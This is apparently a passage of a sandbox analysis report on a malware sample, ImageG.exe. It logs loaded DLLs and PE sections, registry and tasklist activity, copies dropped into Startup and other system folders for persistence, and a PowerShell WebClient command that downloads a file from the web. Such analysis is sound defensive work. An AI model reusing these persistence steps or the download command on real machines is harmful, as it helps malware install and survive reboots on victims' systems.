        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
        Source: C:\Users\user\Desktop\ImageG.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\tasklist.exe tasklist /FO CSV /NH
        Source: Window Recorder  Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeDirectory created: C:\Program Files\Windows NT\TableTextService\ImageG.exeJump to behavior
        Source: ImageG.exeStatic file information: File size 76124537 > 1048576
        Source: ImageG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: ystem.Core.pdbpdb source: powershell.exe, 00000019.00000002.75878039487.000001D2805D0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ws\dll\System.Core.pdb source: powershell.exe, 0000001B.00000002.75860356551.0000016F5147B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000001B.00000002.75860356551.0000016F5147B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: hell.PSReadline.pdb source: powershell.exe, 00000019.00000002.75878039487.000001D2805D0000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')" (2 occurrences)
        Source: ffmpeg.dll.0.dr	Static PE information: section name: .00cfg
        Source: ffmpeg.dll.0.dr	Static PE information: section name: .gxfg
        Source: ffmpeg.dll.0.dr	Static PE information: section name: .retplne
        Source: ffmpeg.dll.0.dr	Static PE information: section name: _RDATA
        Source: ImageG.exe.0.dr	Static PE information: section name: .00cfg
        Source: ImageG.exe.0.dr	Static PE information: section name: .gxfg
        Source: ImageG.exe.0.dr	Static PE information: section name: .retplne
        Source: ImageG.exe.0.dr	Static PE information: section name: .rodata
        Source: ImageG.exe.0.dr	Static PE information: section name: CPADinfo
        Source: ImageG.exe.0.dr	Static PE information: section name: LZMADEC
        Source: ImageG.exe.0.dr	Static PE information: section name: _RDATA
        Source: ImageG.exe.0.dr	Static PE information: section name: malloc_h
        Source: libEGL.dll.0.dr	Static PE information: section name: .00cfg
        Source: libEGL.dll.0.dr	Static PE information: section name: .gxfg
        Source: libEGL.dll.0.dr	Static PE information: section name: .retplne
        Source: libEGL.dll.0.dr	Static PE information: section name: _RDATA
        Source: libGLESv2.dll.0.dr	Static PE information: section name: .00cfg
        Source: libGLESv2.dll.0.dr	Static PE information: section name: .gxfg
        Source: libGLESv2.dll.0.dr	Static PE information: section name: .retplne
        Source: libGLESv2.dll.0.dr	Static PE information: section name: _RDATA
        Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .00cfg
        Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .gxfg
        Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .retplne
        Source: vk_swiftshader.dll.0.dr	Static PE information: section name: _RDATA
        Source: vulkan-1.dll.0.dr	Static PE information: section name: .00cfg
        Source: vulkan-1.dll.0.dr	Static PE information: section name: .gxfg
        Source: vulkan-1.dll.0.dr	Static PE information: section name: .retplne
        Source: vulkan-1.dll.0.dr	Static PE information: section name: _RDATA
        Source: ffmpeg.dll0.0.dr	Static PE information: section name: .00cfg
        Source: ffmpeg.dll0.0.dr	Static PE information: section name: .gxfg
        Source: ffmpeg.dll0.0.dr	Static PE information: section name: .retplne
        Source: ffmpeg.dll0.0.dr	Static PE information: section name: _RDATA
        Source: ImageG.exe0.0.dr	Static PE information: section name: .00cfg
        Source: ImageG.exe0.0.dr	Static PE information: section name: .gxfg
        Source: ImageG.exe0.0.dr	Static PE information: section name: .retplne
        Source: ImageG.exe0.0.dr	Static PE information: section name: .rodata
        Source: ImageG.exe0.0.dr	Static PE information: section name: CPADinfo
        Source: ImageG.exe0.0.dr	Static PE information: section name: LZMADEC
        Source: ImageG.exe0.0.dr	Static PE information: section name: _RDATA
        Source: ImageG.exe0.0.dr	Static PE information: section name: malloc_h
        Source: ImageG.exe4.2.dr	Static PE information: section name: .fptable
        Source: 797897d5-a581-42d8-bf0e-306300e4549c.tmp.node.2.dr	Static PE information: section name: _RDATA

        Persistence and Installation Behavior

        Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')" (2 occurrences)
        Source: C:\Windows\System32\cmd.exe	Process created: reg.exe (26 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe	Process created: reg.exe
        Source: C:\Windows\System32\cmd.exe	Process created: reg.exe (26 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\ImageG.exe
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\db804694-6538-41b3-8e68-e762db905f28.tmp.node (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\76aeac75-a5b5-4872-b3c5-27d2191829fa.tmp.node (2 occurrences)
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\ImageG.exe
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\d3dcompiler_47.dll
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\nsis7z.dll
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\d3dcompiler_47.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\2676205f-d0b6-44b9-8574-4cede5e50ea9.tmp.node (2 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe	File created: C:\Users\user\AppData\Local\Microsoft\MagTable\ImageG.exe
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\797897d5-a581-42d8-bf0e-306300e4549c.tmp.node (2 occurrences)
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\libEGL.dll
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\ffmpeg.dll
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\resources\elevate.exe
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\vk_swiftshader.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe	File created: C:\Program Files\Windows NT\TableTextService\ImageG.exe
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ImageG.exe
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\ImageG.exe
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\vulkan-1.dll
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ffmpeg.dll
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\libGLESv2.dll
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\System.dll
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\ImageG.exe
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\db715fb8-1e47-440d-93b6-4939c549fe98.tmp.node (2 occurrences)
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\LICENSE.electron.txt
        Source: C:\Users\user\Desktop\ImageG.exe	File created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\LICENSE.electron.txt

        Boot Survival

        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ImageG.exe (3 occurrences)
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ImageG.exe\:Zone.Identifier:$DATA

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Users\user\Desktop\ImageG.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
